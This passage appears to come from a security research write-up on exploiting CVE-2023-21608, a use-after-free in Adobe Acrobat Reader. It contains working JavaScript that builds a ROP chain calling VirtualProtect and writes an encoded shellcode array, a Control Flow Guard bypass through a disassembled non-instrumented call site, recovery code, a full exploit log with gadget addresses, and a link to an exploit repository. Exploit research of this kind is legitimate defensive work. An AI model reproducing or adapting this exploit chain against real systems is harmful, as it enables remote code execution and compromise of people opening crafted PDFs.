Set up ROP and execute the shellcode

var rop = [
  AAR(AcroFormApiBase+0x007da108),  // virtualprotect
  arrBufPtr+0x400,                  // return address
  arrBufPtr+0x400,                  // buffer
  0x1000,                           // sz
  0x40,                             // new protect
  arrBufPtr+0x340
];

for(var i=0; i < rop.length; i++) {
  AAW(arrBufPtr + 0x300 + 4 * i, rop[i]);
}

var shellcode = [ 0x90909090,
  835867240, 1667329123, 1415139921, 1686860336, 2339769483,
  1980542347, 814448152, 2338274443, 1545566347, 1948196865,
  4270543903, 605009708, 390218413, 2168194903, 1768834421,
  4035671071, 469892611, 1018101719, 2425393296 ];

for(var i=0; i < shellcode.length; i++) {
  AAW(arrBufPtr+0x400+i*4, re(shellcode[i]));
}

Finally, invoke the shellcode by reading the defaultValue property of the testField object.

var ret = testField.defaultValue;

Control Flow Guard (CFG) Bypass

Adobe Acrobat Reader has CFG enabled by default, so it is not possible to call the shellcode directly. Previous versions of exploits relied on using non-CFG modules within Adobe Reader to create the ROP chain, but newer versions have all modules CFG enabled.

One way to bypass this is to use call sites that are not CFG instrumented. We found multiple non-CFG instrumented call sites that could be used to bypass CFG in Adobe Acrobat Reader. One of these functions is sub_20EFAA60, which loads a table pointer from the object in ecx and calls the entry at offset 0x30 without a CFG check, so it calls an address we control once we control the object that ecx points to.

.text:20EFAA60 ; int __thiscall sub_20EFAA60(void *this)
.text:20EFAA60 sub_20EFAA60    proc near               ; DATA XREF: .rdata:20FF8C11↓o
.text:20EFAA60                                         ; .rdata:21131674↓o ...
.text:20EFAA60                 mov     eax, [ecx]
.text:20EFAA62                 push    0Dh
.text:20EFAA64                 call    dword ptr [eax+30h]
.text:20EFAA67                 retn
.text:20EFAA67 sub_20EFAA60    endp

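Because the cloned vtable holds the stack-pivot gadget at offset 0x30, routing a virtual call through this function transfers control to the pivot and from there to the ROP chain and shellcode.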

Context Restoration and Recovery

After running the shellcode, Acrobat Reader crashes because the relevant context has not been restored. To keep Adobe Acrobat Reader running after exploitation, this context must be restored.

This involves several steps:

Restoring targetStr and targetDV using the fake string and DataView that were created earlier
Restoring the original vtable that was hijacked for code execution
Fixing any corruption caused by the ArrayBuffer corruption and other side effects of this corruption
Restoring the stack (this is done in the shellcode recovery part)
Restoring ESP to its default value (this is also done in the shellcode recovery part)
Backing up original values before corruption so they can be restored once the shellcode is executed (this is shown in the below snippet)

The snippet below backs up some of the original values before corruption so that they can be restored after the shellcode has run.

log("[+] Storing recovery context");

AAW(FAKE_STACK_PTR + 0x60, fieldVtblAddr);                // original vtable ptr (goes back in ECX)
AAW(FAKE_STACK_PTR + 0x64, fieldVtbl);                    // vtable funcs ptr
AAW(FAKE_STACK_PTR + 0x68, originalDefaultValFunc);       // original defaultVal impl to jump to
AAW(FAKE_STACK_PTR + 0x6c, AAR(ARRAY_BUFFER_BASE + 8));   // corrupted ArrayBuffer typed array ptr
AAW(FAKE_STACK_PTR + 0x70, AAR(ARR_BUF_MALLOC_BASE));     // malloc header 0
AAW(FAKE_STACK_PTR + 0x74, AAR(ARR_BUF_MALLOC_BASE + 4)); // malloc header 1

Exploit Log

[+] Acrobat Reader Remote Code Execution
    [*] Version: 21.01120039
[+] Spraying ArrayBuffer of size: 0xffe8
[+] Grooming LFH blocks of size: 68 count: 4000
[+] Triggering garbage collection
[+] Triggering vulnerability
[+] Finding required objects
    [*] Corrupted ArrayBuffer idx: 4604 byteLength: 0x24043250
    [*] addrOf Array start idx: 13221884
    [*] addrOf Array idx: 0
[+] Gaining arbitrary read & write primitive
    [*] Crafting fake DataView: 0x200001d8
[+] Fixing corrupted objects
    [*] Typed array pointer
    [*] Typed array node pointers
    [*] V1 Idx: 4602 address: 0x131cf240 value: 0xd0b8600 correct value: 0xd0b86a0
    [*] ArrayBuffer field
    [*] Fake string
[+] Finding required modules
    [*] AcroForm.api: 0x6ef70000
    [*] KERNEL32.dll: 0x769a0000
    [*] VirtualProtect: 0x769c04c0
[+] Finding gadgets in AcroForm.api
    [*] CFG bypass gadget: 0x6f66aa60
    [+] Stack pivot gadgets
        [*] xchg eax, esp; ret: 0x6ef8e5e6
        [*] pop esp; ret: 0x6ef8e646
[+] Setting up ROP and shellcode
    [*] Payload: 0x2459edd8
[^] Executing payload
[+] Exploit duration: 6.172 seconds
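The addresses in the log can be cross-checked against the offsets used in the exploit code, since each runtime address is the module base plus a fixed offset. The sketch below does only that arithmetic. The helper names are hypothetical, and the IDA image base 0x20800000 is inferred from sub_20EFAA60 and the 0x6faa60 offset rather than stated in the post.

```javascript
// Runtime address of a location at a fixed offset inside a loaded module.
function rebase(moduleBase, offset) {
  return (moduleBase + offset) >>> 0;
}

// Offset of a disassembler address relative to the disassembler's image base.
function offsetFromIda(idaAddress, idaImageBase) {
  return idaAddress - idaImageBase;
}

var ACROFORM_BASE = 0x6ef70000;  // "AcroForm.api" line in the log
var IDA_IMAGE_BASE = 0x20800000; // inferred, see the lead-in

var cfgGadget = rebase(ACROFORM_BASE, 0x6faa60);
var popEspRet = rebase(ACROFORM_BASE, 0x1e646);

console.log("CFG bypass gadget: 0x" + cfgGadget.toString(16));
console.log("pop esp; ret:      0x" + popEspRet.toString(16));
console.log("sub_20EFAA60 offset: 0x" + offsetFromIda(0x20EFAA60, IDA_IMAGE_BASE).toString(16));
```

Both computed gadget addresses match the values printed in the log for this run.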

64-bit Exploitation

The CVE-2023-21608 bug also affected the 64-bit version of Adobe Reader. We evaluated the possibility of exploiting this bug on the 64-bit version.

However, we stumbled upon two major issues:

Heap spraying is no longer possible in the 64-bit address space. Hence, we can no longer rely on the ArrayBuffer spraying technique outlined above to allocate controlled data at predictable addresses. We would need a separate info-leak bug for further exploitation.
Finding an info-leak is not the hard part, however. The core problem that makes this bug useless for 64-bit exploitation is that the sprayed strings are used as aggregation objects: new strings are created from the sprayed string, and the copy honors the standard C null terminator. We therefore cannot use any address that contains two consecutive NULL bytes, and 64-bit user-mode addresses always have zero upper bytes. The terminator stops the string copy, so we can never re-allocate the freed memory with a controlled chunk that contains the leaked ArrayBuffer address. The bug is then no longer effective or reproducible, which rules out exploiting it on the 64-bit version.
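The null-terminator constraint can be illustrated by splitting a pointer into UTF-16 code units and checking for a zero unit. This is a sketch under the assumption that the terminator check happens on aligned 16-bit code units; the function names and the sample 64-bit address are hypothetical.

```javascript
// Split a pointer into little-endian 16-bit code units.
function toCodeUnits(address, pointerBytes) {
  var units = [];
  var value = BigInt(address);
  for (var i = 0; i < pointerBytes / 2; i++) {
    units.push(Number(value & 0xffffn));
    value >>= 16n;
  }
  return units;
}

// A pointer survives a null-terminated UTF-16 copy only if no code unit is zero.
function survivesStringCopy(address, pointerBytes) {
  return toCodeUnits(address, pointerBytes).indexOf(0) === -1;
}

// 32-bit spray address from this post: units 0x0058, 0x2000.
console.log(survivesStringCopy(0x20000058, 4));

// Hypothetical 64-bit user-mode address: the top code unit is always zero.
console.log(survivesStringCopy(0x000001d220000058n, 8));
```

The 32-bit address passes because neither half is zero, while any 64-bit user-mode pointer fails on its upper code unit.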

Exploit Repository

https://github.com/hacksysteam/CVE-2023-21608